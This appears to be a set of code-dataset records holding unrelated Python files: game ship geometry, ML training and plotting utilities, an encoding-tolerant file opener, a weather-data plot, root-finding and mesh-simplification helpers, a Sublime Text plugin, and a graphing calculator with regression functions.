15 - 12.375 = 2.625\n (self.x + (self.radius-2.625) * math.sin(self.rotation + 2.87 * math.pi / 3), (self.y - (self.radius-2.625) * math.cos(self.rotation + 2.87 * math.pi / 3))),\\\n # tail point.\n # point 6: 3 & radius.\n (self.x + self.radius * math.sin(self.rotation + 3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3 * math.pi / 3))),\\\n # final tail point.\n # point 7 equiv 5.\n (self.x + (self.radius-2.625) * math.sin(self.rotation + 3.13 * math.pi / 3), (self.y - (self.radius-2.625) * math.cos(self.rotation + 3.13 * math.pi / 3))),\\\n # Portside engine.\n # point 8 equiv 4. !!! minus 4'd\n (self.x + (self.radius-7.5) * math.sin(self.rotation + 3.2 * math.pi / 3), (self.y - (self.radius-7.5) * math.cos(self.rotation + 3.2 * math.pi / 3))),\\\n # point 9 equiv 3. !!! minus 4'd\n (self.x + (self.radius-6.625) * math.sin(self.rotation + 3.4 * math.pi / 3), (self.y - (self.radius-6.625) * math.cos(self.rotation + 3.4 * math.pi / 3))),\\\n # Port side.\n # point 10 equiv 2.\n (self.x + (self.radius-3.5) * math.sin(self.rotation + 3.33 * math.pi / 3), (self.y - (self.radius-3.5) * math.cos(self.rotation + 3.33 * math.pi / 3))),\\\n # point 11 equiv 1.\n (self.x + (self.radius-5.25) * math.sin(self.rotation + 3.7 * math.pi / 3), (self.y - (self.radius-5.25) * math.cos(self.rotation + 3.7 * math.pi / 3)))]\n self.needsToCalcPoints = False\n \n def calcExtras(self):\n self.hardpoints = [(self.x + (self.radius+2) * math.sin(self.rotation), (self.y - (self.radius+2) * math.cos(self.rotation)), self.rotation)]\n self.hardpoints.append((self.x + (self.radius+2) * math.sin(self.rotation + 2.3 * math.pi / 3), (self.y - (self.radius+2) * math.cos(self.rotation + 2.3 * math.pi / 3)), self.rotation + 2.3))\n self.hardpoints.append((self.x + (self.radius+2) * math.sin(self.rotation + 3.7 * math.pi / 3), (self.y - (self.radius+2) * math.cos(self.rotation + 3.7 * math.pi / 3)), self.rotation + 3.7))\n # engine point calcs. THESE NEED TO BE MOVED TO CALCPOINTS WHEN THEY'RE ONLY DRAWING WHEN ONSCREEN.\n # calculate the xy.\n self.enginePoint1 = ((self.x + (self.radius - 7) * math.sin(self.rotation + 2.7 * math.pi / 3)), (self.y - (self.radius - 7) * math.cos(self.rotation + 2.7 * math.pi / 3)))\n self.enginePoint2 = ((self.x + (self.radius - 7) * math.sin(self.rotation + 3.3 * math.pi / 3)), (self.y - (self.radius - 7) * math.cos(self.rotation + 3.3 * math.pi / 3)))\n # update the xy.\n if self.moving:\n self.engineFlicker1.xy = self.enginePoint1\n self.engineFlicker2.xy = self.enginePoint2\n self.engineFlicker1.visible = True\n self.engineFlicker2.visible = True\n else:\n self.engineFlicker1.visible = False\n self.engineFlicker2.visible = False\n i = 0\n for launcher in self.launchers:\n launcher.hardpoint = self.hardpoints[i]\n launcher.poll()\n i += 1\n \n def die(self):\n self.view.effects.append(effects.ExplosionShip(self.view, self, 10))\n self.view.effects.append(effects.Explosion(self.view, (self.x, self.y), 0.5, (self.radius * 4), misc.WHITE))\n #and remove the ship when done.\n self.remove()\n #any player related stats go here. like death count and such. 
Not sure if we'll need these yet.\n self.engineFlicker1.die()\n self.engineFlicker2.die()\n\n\nclass S1s6(Ship):\n \"\"\" Carrier \"\"\"\n intEnginePoint = [0, 0]\n buildPoints = [(0,0),(0,0)]\n buildQueue = []\n building = False\n buildTimeRemaining = 0\n buildShip = Ship\n\n health = 40\n\n radius = 25\n\n rotateSpeed = 0.004\n speed = 0.1\n\n #buildInfo\n buildCost = 10\n buildTime = 1000\n \n availableToBuild = [S1s1]\n \n def calcPoints(self):\n self.points = [(self.x + self.radius * math.sin(self.rotation + 5.8 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 5.8 * math.pi /3))),\\\n (self.x + self.radius * math.sin(self.rotation + 0.2 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 0.2 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 2 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 2.8 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2.8 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 3.2 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3.2 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 4 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 4 * math.pi / 3)))]\n self.needsToCalcPoints = False\n\n def calcExtras(self):\n self.buildPoints[0] = (self.x + (self.radius + 10) * math.sin(self.rotation)), (self.y - (self.radius + 10) * math.cos(self.rotation))\n\n def poll(self):\n #standard poll functions\n self.orders[0].poll()\n self.calcExtras()\n if self.building == False and len(self.buildQueue) > 0:\n self.buildShip = self.buildQueue.pop(0)\n self.buildShip.orders = [orders.Idle(self)]\n self.buildShip.rotation = self.rotation\n self.player.resources -= self.buildShip.buildCost\n self.buildTimeRemaining = self.buildShip.buildTime\n self.player.ships.append(self.buildShip) # Add to list of ships.\n# print ships\n self.building = True\n elif self.building == True:\n# print self.buildTimeRemaining\n self.buildTimeRemaining -= 1\n self.buildShip.x = self.buildPoints[0][0]\n# print self.buildShip.x\n self.buildShip.y = self.buildPoints[0][1]\n #self.buildShip.rotation = self.rotation\n self.buildShip.rotation = misc.normalisedAngle(0.02 + self.buildShip.rotation)\n self.buildShip.calcPoints()\n self.buildShip.colour = ((self.player.colour[0] * (self.buildShip.buildTime - self.buildTimeRemaining + 1) / self.buildShip.buildTime),\\\n (self.player.colour[1] * (self.buildShip.buildTime - self.buildTimeRemaining + 1) / self.buildShip.buildTime),\\\n (self.player.colour[2] * (self.buildShip.buildTime - self.buildTimeRemaining + 1) / self.buildShip.buildTime))\n #print self.buildShip.colour\n\n if self.buildTimeRemaining == 1:\n #self.buildShip.setOrder(orders.MoveToXY(10,10))\n self.buildShip.justBuilt()\n self.building = False \n\n def addToBuildQueue(self, ship): #Queue a ship class for construction; only works on ships that can build.\n self.buildQueue.append(ship(self.view, self.player, self.buildPoints[0][0], self.buildPoints[0][1])) # Pete, you forgot the self. prefix\n","sub_path":"ships.py","file_name":"ships.py","file_ext":"py","file_size_in_byte":22205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"585835301","text":"def turkish_chars_to_ascii_chars(turkish_string):\n turkish_chars = ['ç', 'ğ', 'ı', 'ö', 'ş', 'ü']\n latin_chars = ['c', 'g', 'i', 'o', 's', 'u']\n\n cleared_str = ''\n for s in turkish_string:\n try:\n index_of_ascii_char = turkish_chars.index(s)\n cleared_str += latin_chars[index_of_ascii_char]\n except ValueError:\n # means that: it is not a special Turkish char\n cleared_str += s\n return cleared_str\n","sub_path":"horsing_around/tests/string_util.py","file_name":"string_util.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"291096265","text":"\"\"\"\nThis modules contains utility functions for data manipulation and plotting of\nresults and data\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import r2_score\nimport torch\n\n\n#######################################################\n# Data Utilities \n#######################################################\n\ndef load_trained_model(previous_model, model, optimizer):\n \n checkpoint = torch.load(previous_model)\n start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n model.eval()\n \n return model, optimizer\n\n\ndef save_trained_model(save_path, epoch, model, optimizer, train_loss, test_loss):\n save_dict = {\n 'epoch': epoch,\n 'state_dict': model.state_dict(),\n# 'train_losses': train_loss\n# 'test_losses': [pce_test_loss, voc_test_loss,\n# jsc_test_loss, ff_test_loss]\n 'optimizer': optimizer.state_dict()\n }\n \n torch.save(save_dict, save_path)\n return\n\n\ndef df_MinMax_normalize(dataframe):\n \n df = dataframe\n \n normed_df = pd.DataFrame()\n\n df_norm_key = {}\n\n for colname, coldata in df.iteritems():\n max_val = coldata.max()\n min_val = coldata.min()\n\n df_norm_key[colname] = [min_val, max_val]\n\n normed_col = (coldata - min_val) / (max_val - min_val)\n normed_df[colname] = normed_col\n \n return normed_df, df_norm_key \n\n\ndef df_MinMax_denormalize(normed_df, norm_key):\n \n denormed_df = pd.DataFrame()\n \n for colname, coldata in normed_df.iteritems():\n mn = norm_key[colname][0]\n mx = norm_key[colname][1]\n \n denormed_col = (coldata * (mx - mn)) + mn\n \n denormed_df[colname] = denormed_col\n \n return denormed_df\n\n\ndef df_Gaussian_normalize(dataframe):\n \n df = dataframe\n normed_df = pd.DataFrame()\n norm_key = {}\n \n for colname, coldata in df.iteritems():\n stdev = coldata.std()\n mean = coldata.mean()\n \n normed_col = (coldata - mean) / stdev\n normed_df[colname] = normed_col\n \n norm_key[colname] = [mean, stdev]\n \n return normed_df, norm_key\n\n\n#######################################################\n# Network Model Utilities\n#######################################################\n\ndef init_weights(model):\n if type(model) == torch.nn.Linear:\n torch.nn.init.xavier_uniform_(model.weight)\n model.bias.data.fill_(0.01)\n \n# if type(model) == nn.BatchNorm1d:\n# model.reset_parameters()\n\n \n\n#######################################################\n# Plotting Utilities\n#######################################################\n\ndef plot_OPV_df_loss(epochs, train_epoch_losses, test_epoch_losses,\n pce_train_epoch_losses, pce_test_epoch_losses,\n voc_train_epoch_losses, voc_test_epoch_losses,\n jsc_train_epoch_losses, jsc_test_epoch_losses,\n ff_train_epoch_losses, ff_test_epoch_losses):\n \n \n fig, ax = plt.subplots(figsize = (8,6))\n \n plt.plot(epochs, train_epoch_losses, c = 'k', label = 'training error')\n plt.plot(epochs, test_epoch_losses, c = 'r', label = 'testing error')\n plt.legend(loc = 'upper right')\n plt.title(\"Total Training & Testing Error\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Total MSE Loss')\n plt.show()\n \n fig, ax = plt.subplots(figsize = (8,6))\n\n plt.plot(epochs[::], pce_train_epoch_losses[::], c = 'k', label = 'pce training')\n plt.plot(epochs[::], pce_test_epoch_losses[::], '-.', c = 'k', label = 'pce testing')\n\n plt.plot(epochs[::], voc_train_epoch_losses[::], c = 'r', label = 'voc training')\n plt.plot(epochs[::], 
voc_test_epoch_losses[::], '-.', c = 'r', label = 'voc testing')\n\n plt.plot(epochs[::], jsc_train_epoch_losses[::], c = 'g', label = 'jsc training')\n plt.plot(epochs[::], jsc_test_epoch_losses[::], '-.', c = 'g', label = 'jsc testing') \n \n plt.plot(epochs[::], ff_train_epoch_losses[::], c = 'b', label = 'ff training') \n plt.plot(epochs[::], ff_test_epoch_losses[::], '-.', c = 'b', label = 'ff testing') \n\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Training & Testing Error\")\n ax.set_xlabel('epoch')\n ax.set_ylabel('MSE')\n plt.show()\n \n return\n\ndef plot_OPV_df_accuracies(epochs, pce_test_epoch_accuracies, voc_test_epoch_accuracies, \n jsc_test_epoch_accuracies, ff_test_epoch_accuracies):\n \n fig, ax = plt.subplots(figsize = (8,6))\n # plt.plot(epochs, train_epoch_accuracy, c = 'k', label = 'training accuracy')\n plt.plot(epochs, pce_test_epoch_accuracies, c = 'k', label = 'pce MAPE')\n plt.plot(epochs, voc_test_epoch_accuracies, c = 'r', label = 'voc MAPE')\n plt.plot(epochs, jsc_test_epoch_accuracies, c = 'g', label = 'jsc MAPE')\n plt.plot(epochs, ff_test_epoch_accuracies, c = 'b', label = 'ff MAPE')\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Testing Accuracy\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Mean Absolute Percent Error')\n plt.show()\n \n return\n\ndef plot_OPV_parity(pce_labels, PCE_out, voc_labels, Voc_out,\n jsc_labels, Jsc_out, ff_labels, FF_out):\n \n xlin = ylin = np.arange(-10, 10, 1)\n\n r2 = r2_score(pce_labels, PCE_out)\n fig, ax = plt.subplots(figsize = (8,6))\n plt.scatter(PCE_out, pce_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n ax.set_xlim(min(pce_labels.min(), PCE_out.min()), max(pce_labels.max(), PCE_out.max()))\n ax.set_ylim(min(pce_labels.min(), PCE_out.min()), max(pce_labels.max(), PCE_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('PCE Parity')\n plt.show()\n\n r2 = r2_score(voc_labels, Voc_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(Voc_out, voc_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(min(voc_labels.min(), Voc_out.min()), max(voc_labels.max(), Voc_out.max()))\n ax.set_ylim(min(voc_labels.min(), Voc_out.min()), max(voc_labels.max(), Voc_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('Voc Parity')\n plt.show()\n\n r2 = r2_score(jsc_labels, Jsc_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(Jsc_out, jsc_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(min(jsc_labels.min(), Jsc_out.min()), max(jsc_labels.max(), Jsc_out.max()))\n ax.set_ylim(min(jsc_labels.min(), Jsc_out.min()), max(jsc_labels.max(), Jsc_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('Jsc Parity')\n plt.show()\n\n r2 = r2_score(ff_labels, FF_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(FF_out, ff_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(min(ff_labels.min(), FF_out.min()), max(ff_labels.max(), FF_out.max()))\n ax.set_ylim(min(ff_labels.min(), FF_out.min()), max(ff_labels.max(), FF_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('FF Parity')\n plt.show()\n \n \ndef plot_OFET_df_loss(epochs, train_epoch_losses, test_epoch_losses,\n mu_train_epoch_losses, mu_test_epoch_losses,\n 
r_train_epoch_losses, r_test_epoch_losses,\n on_off_train_epoch_losses, on_off_test_epoch_losses,\n vt_train_epoch_losses, vt_test_epoch_losses):\n \n \n fig, ax = plt.subplots(figsize = (8,6))\n \n plt.plot(epochs[::], train_epoch_losses[::], c = 'k', label = 'training error')\n plt.plot(epochs[::], test_epoch_losses[::], c = 'r', label = 'testing error')\n plt.legend(loc = 'upper right')\n plt.title(\"Total Training & Testing Error\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Total MSE Loss')\n plt.show()\n \n fig, ax = plt.subplots(figsize = (8,6))\n\n plt.plot(epochs[::], mu_train_epoch_losses[::], c = 'k', label = 'mu training')\n plt.plot(epochs[::], mu_test_epoch_losses[::], '-.', c = 'k', label = 'mu testing')\n\n plt.plot(epochs[::], r_train_epoch_losses[::], c = 'r', label = 'r training')\n plt.plot(epochs[::], r_test_epoch_losses[::], '-.', c = 'r', label = 'r testing')\n\n plt.plot(epochs[::], on_off_train_epoch_losses[::], c = 'g', label = 'on_off training')\n plt.plot(epochs[::], on_off_test_epoch_losses[::], '-.', c = 'g', label = 'on_off testing') \n \n plt.plot(epochs[::], vt_train_epoch_losses[::], c = 'b', label = 'vt training') \n plt.plot(epochs[::], vt_test_epoch_losses[::], '-.', c = 'b', label = 'vt testing') \n\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Training & Testing Error\")\n ax.set_xlabel('epoch')\n ax.set_ylabel('MSE')\n plt.show()\n \n return\n\n\ndef plot_OFET_df_accuracies(epochs, mu_test_epoch_accuracies, r_test_epoch_accuracies, \n on_off_test_epoch_accuracies, vt_test_epoch_accuracies):\n \n fig, ax = plt.subplots(figsize = (8,6))\n # plt.plot(epochs, train_epoch_accuracy, c = 'k', label = 'training accuracy')\n plt.plot(epochs, mu_test_epoch_accuracies, c = 'k', label = 'mu MAPE')\n plt.plot(epochs, r_test_epoch_accuracies, c = 'r', label = 'r MAPE')\n plt.plot(epochs, on_off_test_epoch_accuracies, c = 'g', label = 'on_off MAPE')\n plt.plot(epochs, vt_test_epoch_accuracies, c = 'b', label = 'vt MAPE')\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Testing Accuracy\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Mean Absolute Percent Error')\n plt.show()\n \n return\n\n\ndef plot_OFET_parity(mu_labels, mu_out, r_labels, r_out,\n on_off_labels, on_off_out, vt_labels, vt_out):\n \n xlin = ylin = np.arange(-20, 20, 1)\n\n r2 = r2_score(mu_labels, mu_out)\n fig, ax = plt.subplots(figsize = (8,6))\n plt.scatter(mu_labels, mu_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('mu Parity')\n plt.show()\n\n r2 = r2_score(r_labels, r_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(r_labels, r_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('r Parity')\n plt.show()\n\n r2 = r2_score(on_off_labels, on_off_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(on_off_labels, on_off_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('on_off Parity')\n plt.show()\n\n r2 = r2_score(vt_labels, vt_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(vt_labels, vt_out)\n plt.plot(xlin, 
ylin, c = 'k')\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('Vt Parity')\n plt.show()","sub_path":"m2py/networks/network_utils.py","file_name":"network_utils.py","file_ext":"py","file_size_in_byte":11565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
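A minimal round-trip check for the Min-Max helpers in network_utils.py above; a sketch assuming a pandas version that still provides DataFrame.iteritems (it was removed in pandas 2.0) and purely numeric columns, since min/max are taken per column:

    import pandas as pd

    df = pd.DataFrame({"pce": [1.0, 2.0, 4.0], "voc": [0.5, 0.7, 0.9]})
    normed, key = df_MinMax_normalize(df)          # each column scaled into [0, 1]
    restored = df_MinMax_denormalize(normed, key)  # key holds [min, max] per column
    assert ((restored - df).abs() < 1e-9).all().all()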
+{"seq_id":"57935349","text":"\"\"\"\n自定义的open, 用于不同之间的编码\n\"\"\"\n\n# 支持的编码类型\nCodings = {\"utf8\", \"gbk\"}\n\n# 文件操作符类型\nfs_oprate = {\"w\", \"r\"}\n\n\nclass OprationError(Exception):\n def __str__(self):\n return \"文件操作符类型不正确!,仅支持{}\".format(\"和\".join(fs_oprate))\n\n\nclass CustomOpen:\n \"\"\"\n 重写open\n \"\"\"\n def __init__(self, file, rwmode=\"\"):\n self.rwmode = rwmode\n self.file = file\n self._f = \"\"\n self.data = \"\"\n self.__initread()\n\n def __initread(self):\n if not self.rwmode:\n for code in Codings:\n try:\n self._f = open(self.file, encoding=code)\n self.data = self._f.read()\n break\n except UnicodeDecodeError:\n continue\n else:\n if self.rwmode == \"r\":\n for code in Codings:\n try:\n self._f = open(self.file, self.rwmode, encoding=code)\n self.data = self._f.read()\n break\n except UnicodeDecodeError:\n continue\n if self.rwmode == \"w\":\n for code in Codings:\n try:\n self._f = open(self.file, self.rwmode, encoding=code)\n break\n except UnicodeDecodeError:\n continue\n\n def read(self):\n return self.data\n\n def write(self, content):\n self._f.write(content)\n\n def close(self):\n self._f.close()\n\n def __setattr__(self, key, value):\n if key == \"rwmode\":\n if value not in {\"r\", \"w\", \"\"}:\n raise OprationError\n super().__setattr__(key, value)\n\n\nif __name__ == \"__main__\":\n f = CustomOpen(r\"/home/tangxinwu/Desktop/workspace/Android/gradle.properties\")\n print(f.read())\n","sub_path":"infrastructure/plugin/CustomOpen.py","file_name":"CustomOpen.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"476675251","text":"''' This script produces a scatter plot of the Hourly Wind Speed (HOURLYWindSpeed) vs Hourly Station Pressure (HOURLYStationPressure).\nAny wind speeds over 70% of max wind should be colored red. '''\n\n'''Data downloaded from National Center for Environmental Information (NCEI)'''\n\n\n\nimport numpy as np \nimport matplotlib.pyplot as plt\n\n##Read the csv file\ndata = 'NCEIdata.csv'\n\n\"\"\"Making a 2d numpy array from data where only the wind and pressure columns are taken\nAlso masked and hide columns with no values\"\"\"\ndata1 = np.genfromtxt(data, delimiter=',', dtype = float, skip_header=1, usecols=(17,20))\ndata1 = np.ma.masked_where(np.isnan(data1), data1)\ndata1 = np.ma.compress_rows(data1)\n\n\n#Defining wind and pressure array through indexing\nwind = (data1[:,0])\npressure = (data1[:,1])\n\n#Finding the 70% of highest wind threshold\nhighwind = (np.amax(wind))*0.7\n\n#Making a array where winds below threshold are masked\nstrongwind = np.ma.masked_where(wind < highwind, wind)\n\n\n#Making the plot \nplt.scatter(wind,pressure, label = \"Wind vs. Pressure\", s = 4)\nplt.scatter(strongwind,pressure, c = 'r', s = 4, label = \"Strongest Wind vs. Pressure\")\nplt.title(\"Wind Speed vs. Pressure\")\nplt.xlabel(\"Wind Speed (mph)\")\nplt.ylabel(\"Pressure (in)\")\nplt.legend(loc='best')\nplt.show()\n\n\n\n\n","sub_path":"NCEI_Conditions.py","file_name":"NCEI_Conditions.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"50080683","text":"class RootFindingClass:\n def __init__(self, minv, maxv, N, method, f, fp, tol):\n import numpy as np\n self.minv = float(minv)\n self.maxv = float(maxv)\n self.N = N\n self.method = method\n self.f = f\n self.fp = fp\n self.tol = tol\n\n def Solve(self):\n\n if self.method is 'Bisection':\n from Bisection import Bisection\n self.x_n = Bisection([self.minv, self.maxv], self.N, self.f)\n elif self.method is 'RegulaFalsi':\n from RegulaFalsi import RegulaFalsi\n self.x_n = RegulaFalsi([self.minv, self.maxv], self.N, self.f)\n elif self.method is 'Secant':\n from Secant import Secant\n self.x_n = Secant([self.minv, self.maxv], self.N, self.f)\n elif self.method is 'NewtonRaphson':\n from NewtonRaphson import NewtonRaphson\n self.x_n = NewtonRaphson([self.minv, self.maxv], self.N, self.f, self.fp)\n elif self.method is 'Brent':\n from Brent import Brent\n self.x_n = Brent([self.minv, self.maxv], self.N, self.f, self.tol)\n\n#def f (x): return x**3 - 27\n#def fp(x): return 3*x**2\n#\n#Eqn = RootFindingClass(1, 10, 10, 'Brent', f, fp, 1e-4)\n#Eqn.Solve()\n#\n#print Eqn.x_n\n","sub_path":"Root finding/RootFinding_class.py","file_name":"RootFinding_class.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"524228501","text":"import numpy as np\nimport open3d as o3d\n\n\ndef simplification(verts, faces, target_number_of_triangles, maximum_error=None, boundary_weight=1.0):\n tri_mesh = o3d.geometry.TriangleMesh()\n tri_mesh.vertices = o3d.utility.Vector3dVector(verts)\n tri_mesh.triangles = o3d.utility.Vector3iVector(faces)\n simplified_mesh = tri_mesh.simplify_quadric_decimation(\n target_number_of_triangles)\n return np.array(simplified_mesh.vertices), np.array(simplified_mesh.triangles)\n","sub_path":"mesh_process/simplification.py","file_name":"simplification.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"364817264","text":"import sublime, sublime_plugin\n\n\nclass MultiSelectCommand(sublime_plugin.TextCommand):\n '''\n Установка курсора в начало каждой из выделенных строк\n '''\n def run(self, edit):\n v = self.view\n\n # Получаем выделенные регионы\n selected_regions = list(v.sel())\n\n # Убираем выделения текста\n v.sel().clear()\n\n '''\n Проходимся по всем выделеным регионам\n и получаем границы выделенных строк\n '''\n for sel_region in selected_regions:\n selected_lines = v.lines(sel_region)\n\n # Проходимся по всем выделенным строкам\n for (start, end) in selected_lines:\n # Устанавливаем курсор в начало строки\n v.sel().add(sublime.Region(start))\n\n sublime.status_message(\"success\")\n","sub_path":"multiselect.py","file_name":"multiselect.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"382549020","text":"# Andy Kotz final project: graphing calculator with regressions\n\nfrom ggame import App, Color, LineStyle, Sprite, RectangleAsset, TextAsset\nfrom ggame import CircleAsset, ImageAsset\nfrom math import sin, cos, radians\n\nSCREEN_WIDTH = 1900\nSCREEN_HEIGHT = 1000\n\ndef correlation(xlistpts,ylistpts):\n N = len(xlistpts)\n corgofor = 0\n Exylist = []\n while corgofor <= len(xlistpts)-1:\n jum = xlistpts[corgofor]*ylistpts[corgofor]\n Exylist.append(jum)\n corgofor += 1\n Exy = sum(Exylist)\n Ex = sum(xlistpts)\n Ey = sum(ylistpts)\n Ex2list = []\n Ey2list = []\n for j in xlistpts:\n jummy = j**2\n Ex2list.append(jummy)\n for i in ylistpts:\n jumby = i**2\n Ey2list.append(jumby)\n Ex2 = sum(Ex2list)\n Ey2 = sum(Ey2list)\n numerator = (N*Exy)-(Ex*Ey)\n denominator = (((N*Ex2)-(Ex)**2)*((N*Ey2)-(Ey)**2))**0.5\n r = numerator/denominator\n return (r)\ndef quadreg(xlistpts,ylistpts):\n N = len(xlistpts)\n Ex = sum(xlistpts)\n Ey = sum(ylistpts)\n Ex2list = []\n Ex3list = []\n Ex4list = []\n for j in xlistpts:\n jummy = j**2\n Ex2list.append(jummy)\n Ex2 = sum(Ex2list)\n for j in xlistpts:\n jummy = j**3\n Ex2list.append(jummy)\n Ex3 = sum(Ex3list)\n for j in xlistpts:\n jummy = j**4\n Ex2list.append(jummy)\n Ex4 = sum(Ex4list)\n corgofor = 0\n Exylist = []\n while corgofor <= len(xlistpts)-1:\n jum = xlistpts[corgofor]*ylistpts[corgofor]\n Exylist.append(jum)\n corgofor += 1\n Exy = sum(Exylist)\n Ex2y = Ex2+Ey\n Exx = (Ex2)-(((Ex)**2)/N)\n Exy = (Exy) - ((Ex*Ey)/N)\n Exx2 = (Ex3) - ((Ex2*Ex)/N)\n Ex2y = (Ex2y) - ((Ex2*Ey)/N)\n Ex2x2 = (Ex4) - (((Ex2)**2)/N)\n a = ((Ex2y*Exx)-(Exy*Exx2))/((Exx*Ex2x2)-(Exx2)**2)\n b = ((Exy*Ex2x2)-(Ex2y*Exx2))/((Exx*Ex2x2)-(Exx2)**2)\n c = (Ey/N)-(b*(Ex/N))-(a*(Ex2/N))\n returnlist = [a,b,c]\n return(returnlist)\n\ncoords = None\nesetreg = TextAsset(\"Congratulations! you win 1 million dollars!\", style = '40pt Arial')\nred = Color(0xff0000, 1.0)\ngreen = Color(0x00ff00, 1.0)\nblue = Color(0x0000ff, 1.0)\nblack = Color(0x000000, 1.0)\npurple = Color(0x9B30FF, 1.0)\ngrey = Color(0xd3d3d3, 0.7)\nthinline = LineStyle(0, black)\nyaxis = RectangleAsset(1, 1000, thinline, black)\nxaxis = RectangleAsset(1900, 1, thinline, black)\nycursor = RectangleAsset(1, 1000, thinline, grey)\nxcursor = RectangleAsset(1900, 1, thinline, grey)\nclass Xcursorclass(Sprite):\n def __init__(self, position):\n super().__init__(xcursor, position)\nclass Ycursorclass(Sprite):\n def __init__(self, position):\n super().__init__(ycursor, position)\nxcurse = Xcursorclass((0,0))\nycurse = Ycursorclass((0,0))\nxaxisrulings = RectangleAsset(1, 7, thinline, black)\nyaxisrulings = RectangleAsset(7, 1, thinline, black)\nthinline = LineStyle(0, black)\ncircle = CircleAsset(3, thinline, blue)\ncirclebig = CircleAsset(6, thinline, red)\nSprite (xaxis, (0, 500))\nSprite (yaxis, (950, 0))\nsmiley = ImageAsset(\"smileyface.jpg\")\nyaxisrulingsprites = [Sprite(yaxisrulings, (947.5, y*20)) for y in range(-100, 100, 1)]\nxaxisrulingsprites = [Sprite(xaxisrulings, (x*20+10, 497)) for x in range(-150, 150, 1)]\n\nxcoordinates2 = range(-1500, 1500, 1)\nxcoordinates = []\nfor x in xcoordinates2:\n x = x/32\n xcoordinates.append(x)\n\npointpos = 1\nlinetypelist = input(\"choose function, plot (f,p). 
